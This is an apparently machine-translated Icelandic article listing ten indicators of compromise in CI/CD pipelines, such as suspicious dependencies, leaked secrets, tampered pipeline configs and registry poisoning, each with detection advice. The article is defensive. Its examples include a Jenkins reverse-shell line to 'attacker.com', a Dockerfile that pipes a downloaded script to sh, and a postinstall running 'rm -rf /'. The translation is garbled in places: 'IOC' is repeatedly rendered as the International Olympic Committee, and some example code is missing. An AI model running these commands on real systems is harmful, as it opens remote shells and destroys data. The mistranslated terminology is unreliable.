Inngangur: Hvað eru vísbendingar um málamiðlanir í netöryggi?
Vísbendingar um brot eru fyrstu viðvörunarmerkin um að kerfið þitt eða pipeline gæti verið undir árás. Einfaldlega sagt, vísbendingar um málamiðlun eru ummerki eftir árásarmenn, eins og undarleg logins, skráarbreytingar eða falinn spilliforrit. Í Netöryggi Alþjóðaólympíunefndarinnar, þau virka eins og fingraför á vettvangi glæps og gefa þér skýr sönnunargögn um að eitthvað sé að. Þess vegna, þegar forritarar spyrja hvað eru merki um málamiðlun, svarið takmarkast ekki við netþjóna eða eldveggi, það felur einnig í sér áhættu sem felst í nútíma CI/CD pipelines.
Í þessum pipelinegeta árásarmenn átt við kóða, sprautað inn illgjarnum ósjálfstæðum tengingum eða breytt smíðaskrefum án þess að taka eftir þeim. Hins vegar einblína flestar leiðbeiningar enn aðeins á netþjóna eða net. Fyrir vikið hefur hugbúnaðarframboðskeðjan orðið eitt auðveldasta skotmarkið.
Þess vegna er það að finna vísbendingar um málamiðlun í CI/CD pipelines er nauðsynlegt. Umfram allt hjálpar það teymum að loka fyrir spilliforrit, vernda leyndarmál og tryggja hvert skref í afhendingu hugbúnaðar.
10 helstu vísbendingar um málamiðlun í CI/CD Pipelines
Þegar útskýrt er hvort um brot sé að ræða, þá einblína flestir listar á netþjóna eða netkerfi. CI/CD pipelineÁrásarmenn skilja eftir mjög mismunandi fingraför. Að bera kennsl á þessi merki er lykilatriði fyrir fyrirbyggjandi vörn. Hér að neðan eru 10 viðvörunarmerki IOC varðandi netöryggi sem allir forritarar og öryggisverkfræðingar ættu að fylgjast með.
1. Grunsamlegar breytingar á ósjálfstæði
Einn helsti vísirinn að málamiðlun í pipelines er skyndileg og undarleg uppfærsla á ósjálfstæði. Árásarmenn nota oft traustið sem forritarar setja í pakkastjóra til að bæta við hættulegum pökkum.
Til dæmis, í npm a package.json breytileiki gæti skyndilega innihaldið:
Slíkar breytingar geta virst öruggar en geta sprautað trójuhestuðum kóða inn í allar byggingar.
Áhrif: Skemmdar byggingar erfa spilliforrit við upptök sín.
Uppgötvun: framfylgja ósjálfstæðisskoðunum, fylgjast með mismunandi læsingarskrám og skanna nýja pakka allan tímann.
2. Dulkóðaður kóði í smíðum
Höfundar spilliforrita treysta á dulritun til að komast hjá umsögnum. Þar af leiðandi er þessi vísbending um brot í CI/CD pipelines getur verið eitt það erfiðasta að ná. Reyndar lenda dulbúnar gagnamagn oft í opnum hugbúnaðarbókasöfnum eða gámamyndum án þess að taka eftir því.
Til dæmis:
- PyPI pakki sem notar
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Docker mynd pakkað með ónauðsynlegum UPX tvíundaskrám.
- JavaScript fullt af
\x41\x42sleppur við að fela skilríkisþjófa.
Áhrif: Falinn kóði keyrir hljóðlega meðan á smíði eða keyrslu stendur, sem gerir þetta að mikilvægu merki í netöryggi Alþjóðaólympíunefndarinnar.
Uppgötvun: Sameina SAST með spilliforritaskönnun til að merkja kóðaðan eða pakkaðan kóða. Umfram allt, líttu á rugling sem viðvörunarmerki sem þarfnast frekari rannsókna.
3. Leyndarmál afhjúpuð í Git: Klassísk netöryggisáhætta hjá Alþjóðaólympíunefndinni (IOC)
CI/CD pipelineerfa oft leyndarmál beint úr geymslum. Hins vegar, þegar leyndarmál birtast í Git, þau verða eitt skýrasta svarið við spurningunni „hver eru vísbendingar um málamiðlun í pipelineÞegar innskráningarupplýsingar eru komnar í Git geta árásarmenn nýtt sér þær endalaust.
Til dæmis:
- A
.envskrá sem inniheldurAWS_SECRET_KEY=. - Tákn ýtt inn
config.json. - Leyndarmál eru enn sýnileg í Git-sögunni jafnvel eftir að þau hafa verið fjarlægð.
Áhrif: Óvarðir lyklar veita árásarmönnum beinan aðgang að CI/CD pipelines, skýjakerfi eða gagnagrunna. Þetta er því einn hættulegasti vísirinn um brot.
Uppgötvun: Notið pre-commit hooks og CI-verk fyrir leynilegar skönnunar og afturkalla lekaða lykla tafarlaust. Að auki, framfylgja sjálfvirkri úrbótum til að draga úr útsetningarglugga.
4. Töfrað Pipeline Stillingar: Falin merki um málamiðlun
Pipeline Stillingar eru verðmæt markmið vegna þess að Ein breyting rænir oft öllu vinnuflæðinuÞar af leiðandi, átt við pipeline Skrár eru mikil netöryggisáhætta IOC sem hefðbundin eftirlitstæki greina sjaldan.
Til dæmis:
Í GitHub aðgerðum:
- Í GitLab: illgjarnt verk bætt við
.gitlab-ci.ymlsem losar viðkvæmar upplýsingar. - Í Jenkins:
sh "nc -e /bin/bash attacker.com 4444".
Áhrif: Þessar ósamþykktu breytingar breyta þér pipeline inn í varanlega bakdyr fyrir árásarmenn, sem telst greinilega sem vísbending um að verið sé að brjóta í bága.
Uppgötvun: Framfylgja undirrituðum stillingum, krefjast samþykkis PR og fylgjast með óvæntum verkefnum. Að auki, stilltu guardrails sem loka sjálfkrafa fyrir breytt vinnuflæði.
5. Forréttindi IaC Vanskil
Rangstilltar skilgreiningar á innviðum skapa oft falda bakdyr. Þar af leiðandi verða forréttindalausnir í IaC eru klassísk netöryggisáhætta Alþjóðaólympíunefndarinnar.
Til dæmis:
- Kubernetes dreifingarveitingarhylki
privileged: true. - Helm töflur sem sýna þjónustu með
0.0.0.0:22.
Áhrif: Árásarmenn fá aðgang að rótarkerfinu eða afhjúpa innri þjónustu opinberlega. Þar af leiðandi auka þessi vandamál árásarflötinn verulega.
Uppgötvun: Sækja um IaC skönnun til að framfylgja lágmarksréttindum fyrir sameiningu. Að auki skal tryggja að allar stillingar séu yfirfarnar sem hluti af pipeline.
6. Óvenjuleg byggingarhegðun
Árásarmenn breytast oft pipeline hegðun til að laumast í illgjarnar aðgerðir. Með öðrum orðum, óvenjuleg byggingarvirkni er eitt skýrasta svarið við því hvað eru vísbendingar um brot í CI/CD pipelines.
Til dæmis:
- Byggir netbeiðnir sem senda út á ókunnug lén.
- Node.js verkefni ræsir skyndilega PowerShell á meðan
npm install. - CI-verkefni sem hleður niður stórum tvíundaskrám sem eru ekki skilgreindar í byggingarskriftum.
Áhrif: Í hættu geta hugbúnaðarsmíðar virkað sem dreifingarpunktar fyrir spilliforrit. Umfram allt dreifa þeir skaðlegum gögnum um hverja einustu uppsetningu.
Uppgötvun: Fylgist með byggingarskrám til að finna óvænt ferli eða tengingar. Ennfremur skal stilla fráviksgreiningu til að merkja hegðun sem er utan viðmiðunar.
7. Illgjarn pakkaforskrift sem netöryggisáhætta frá Alþjóðaólympíunefndinni (IOC)
Líftími pakkastjóra hooks sem árásarmenn nýta sér. Þess vegna eru illgjarn forskriftir í npm, PyPI eða Dockerfiles sterk vísbending um að kerfið sé í hættu.
Til dæmis:
- npm:
postinstallhandrit í gangirm -rf /eða senda boðbera til C2. - PyPI:
setup.pyKeyrir falinn Python kóða við uppsetningu. - Dockerfile:
RUN curl attacker.sh | sh.
Áhrif: Árásin fer fram meðan á uppsetningu stendur, áður en nokkur prófun fer fram. Þar af leiðandi gætu forritarar aldrei tekið eftir því fyrr en það er of seint.
Uppgötvun: Skannaðu pakkaupplýsingar fyrir uppsetningarforskriftir. Að auki, takmarkaðu áhættusöm hooks in CI/CD störf til að draga úr útsetningu.
8. Vísbendingar um skemmdir á skránni vegna eitrunar
Árásarmenn skipta út eða breyta gripum í skrám og þessir atburðir eru kennslubókardæmi um það sem eru vísbendingar um ógn í framboðskeðjunni. pipelines.
Til dæmis:
- Myndamerki í Docker uppfærist hljóðlega með trójuhestalögðu lagi.
- Innri umbúðir skipt út fyrir eitraða útgáfu.
- npm nafnrýmissquatting, eins og
lodash-proxy.
Áhrif: Sérhver útgáfa sem notar skráningargripinn verður í hættu. Ekki nóg með það, heldur dreifist hættan einnig til þjónustu eftir vinnslu.
Uppgötvun: Framfylgja undirskriftar- og heilleikaprófunum á öllum skráningarsöfnum. Að auki skal rekja uppruna gripa með SBOM löggilding.
9. Óeðlileg virkni notenda sem sönnunargögn Alþjóðaólympíunefndarinnar (IOC)
Reikningar sem hafa verið brotnir skilja næstum alltaf eftir sig óeðlileg spor. Þar af leiðandi er óvenjuleg hegðun forritara sterk vísbending um málamiðlanir.
Til dæmis:
- Commits ýtt klukkan 3 að staðartíma.
- Samþykki almannatengsla frá reikningum í fríi.
- Pipelines kviknar af óvenju tíðni.
Áhrif: Árásarmenn misnota stolnar innskráningarupplýsingar til að setja inn illgjarnar breytingar. Óheimilar breytingar eru jú óheimilar. commitfalla auðveldlega inn í venjuleg vinnuflæði.
Uppgötvun: Skjár SCM virkni vegna frávika, framfylgja MFA og skipta reglulega um tákn. Að auki, vara við grunsamlegum commit eða samþykkismynstur.
10. Misheppnaðar heiðarleika- eða undirskriftarathuganir í netöryggi Alþjóðaólympíunefndarinnar (IOC)
Algengt en hunsað vísbending um málamiðlun er misheppnuð heilleika- eða undirskriftarprófun. Í netöryggi Alþjóðaólympíunefndarinnar staðfesta þessar prófanir að kóði eða gripir séu áreiðanlegir. Ef þeim er sleppt er skilið eftir pipelineer útsett.
Dæmi:
- SHA256 kjötkássa passar ekki við væntanlega eftirlitssummu.
- GPG undirskrift vantar eða er ógild.
- An SBOM sýnir óundirritaðar gripi.
Áhrif: Brot á heiðarleika þýða oft að hugbúnaður er tekinn í notkun, að hann er eitraður fyrir skrásetningu eða að spilliforrit eru sprautuð inn.
Uppgötvun: Sjálfvirknivæðið undirskriftarathuganir, framfylgið staðfestingu á eftirlitssummum og blokkið óundirritaða íhluti. Umfram allt, lítið á hverja misheppnaða athugun sem skýr sönnun fyrir brotinu.
CI/CD Vísbendingar um málamiðlun í hnotskurn
| Vísir um málamiðlun (IOC) | Áhrif í CI/CD Pipelines | Hvernig á að greina |
|---|---|---|
| Grunsamlegar breytingar á ósjálfstæði | Árásarmenn setja illgjarn bókasöfn inn í pakkastjóra, sem leiðir til þess að byggingar verða í hættu. | Fylgstu með mismunandi læsingarskrám, framfylgdu endurskoðun á tengslum og skannaðu tengsl stöðugt. |
| Dulkóðaður kóði í smíðum | Falin gagnageymsla keyrist án þess að vera uppgötvuð meðan á smíðum eða keyrslu stendur. | Notið SAST og skanning á spilliforritum til að merkja base64, hex eða pakkað kóðamynstur. |
| Leyndarmál afhjúpuð í Git | Leknar táknmyndir eða API-lyklar veita árásarmönnum beinan aðgang að mikilvægum kerfum. | Keyra leynilegar skannanir í Git hooks og afturkalla lekaðar innskráningarupplýsingar sjálfkrafa. |
| Töfrað Pipeline Stillingar | Breytt vinnuflæði leyfa gagnaflutning eða varðveislu innan CI/CD. | Krefjast samþykkis PR, framfylgja undirrituðum stillingum og fylgjast með pipeline breytingar. |
| Forréttindi IaC Vanskil | Of eftirlátsöm hlutverk eða óörugg sjálfgefin kerfi afhjúpa skýjaumhverfi. | Skannaðu Terraform, Kubernetes og Helm skrár til að tryggja sem minnst réttindi. |
| Óvenjuleg byggingarhegðun | PipelineNotað sem dreifingarpunktar fyrir spilliforrit eða til hliðarhreyfinga. | Greinið byggingarskrár til að finna óvænt niðurhöl, ferla eða útköll. |
| Illgjarn pakkaforskriftir | Falin for-/eftiruppsetningarforskriftir virkja gagnamagn áður en keyrsluprófanir eru gerðar. | Lokaðu áhættusömum npm/PyPI forskriftum og takmarkaðu keyrslu í CI/CD störf. |
| Eitrun í skránni | Trójuheppnuð gripi koma í stað traustra mynda eða tvíundaskráa í skrám. | Staðfestu eftirlitssummur, framfylgdu undirskriftarstaðfestingu og skannaðu skrár fyrirbyggjandi. |
| Óeðlileg virkni notenda | Aðgangur sem hefur verið brotinn á reikningum ýtir á skaðleg gögn commits eða kveikja pipelines. | Framfylgja MFA, fylgjast með commits fyrir frávik og greina login mynstur. |
| Misheppnaðar heiðarleika- eða undirskriftarathuganir | Gefur til kynna að kóði, ósjálfstæði eða myndir hafi verið breytt í pipeline. | Sjálfvirknivæða áreiðanleikaprófanir og loka fyrir óundirritaða eða ósamræmanlega íhluti. |
Af hverju hefðbundið netöryggi Alþjóðaólympíunefndarinnar (IOC) vantar CI/CD Áhætta
Flestar stofnanir fylgjast nú þegar með vísbendingum um brot á netþjónum, tölvum eða netkerfum. Hins vegar hunsar þessi klassíska nálgun á netöryggi Alþjóðaviðskiptaráðsins (IOC) ... CI/CD pipelines, sem eru nú einn mikilvægasti árásarflöturinn. Reyndar, pipelinesýna einstök málamiðlanir sem hefðbundin verkfæri geta ekki greint.
Vísbendingar um málamiðlun í hefðbundnu öryggiskerfi
Í hefðbundinni netöryggisráðgjöf Alþjóðaólympíunefndarinnar (IOC) er áherslan venjulega á:
- óvenjuleg logineða IP-tölur sem benda til stolinna innskráningarupplýsinga.
- Grunsamlegar skráarrofsmyndir eða breytingar á skrásetningunni sem afhjúpa spilliforrit.
- Óvænt útleiðandi umferð sem bendir til gagnaútrýmingar.
Þetta eru vel þekktir vísbendingar sem einnig er fylgst með í MITER ATT&CK ramma, sem kortleggur algeng hegðun og aðferðir andstæðinganna. Þetta eru gagnleg merki. Þau eiga þó aðallega við um stýrikerfi eða fyrirtækjanet. Þar af leiðandi missa þau af þeirri lúmsku breytingu sem á sér stað fyrr í hugbúnaðarframboðskeðjunni.
Hvers CI/CD Pipelines eru ólík
CI/CD pipelineeru sjálfvirk umhverfi þar sem forritarar commit kóða, draga ósjálfstæði og gefa út byggingar. Árásarmenn vita að ein málamiðlun hér hefur áhrif á allar dreifingar. Samkvæmt því, hverjar eru vísbendingar um málamiðlun í CI/CD pipelineÞau líta mjög ólík út:
- Illgjarnt kóða sem bætt var hljóðlega við package.json eða requirements.txt.
- API lyklar eða tákn birt í Git commits eða .env skrár.
- Dulbúinn kóði settur inn í npm eða PyPI pakka.
- Terraform eða Kubernetes skrár með óöruggum sjálfgefnum stillingum eins og privilegeed: true.
- Pipeline verkum breytt til að sía gögn eða opna bakdyr.
Þessi málamiðlunarmerki í CI/CD vera ósýnilegur fyrir standard öryggisverkfæri.
Bilið í netöryggi Alþjóðaólympíunefndarinnar
Þó að mörg teymi skilji gildi vísbendinga um brot, þá treysta þau samt sem áður eingöngu á greiningu frá netþjónum og netskrám. Þess vegna geta árásarmenn eitrað byggingar eða sett inn spilliforrit án þess að skilja eftir sig venjuleg ummerki. Þess vegna voru atvik eins og XZ Utils bakdyrnar eða illgjarn npm pakkar ógreind fyrr en þau komust í framleiðslu.
Þess konar málamiðlanir í framboðskeðjunni eru einnig undirstrikaðar af CISLeiðbeiningar um öryggi framboðskeðjunnar hjá A, sem varar við því að árásarmenn miði í auknum mæli á CI/CD pipelines og skrár.
The Takeaway
Hefðbundin netöryggi Alþjóðaólympíunefndarinnar (IOC) er nauðsynleg en ekki nægjanleg. Umfram allt verða teymi að bera kennsl á vísbendingar um ógn sem tengist CI/CD pipelines. Aðeins þá geta þeir greint skaðlegan kóða eða pipeline ofbeldi áður en það breiðist út um umhverfið.





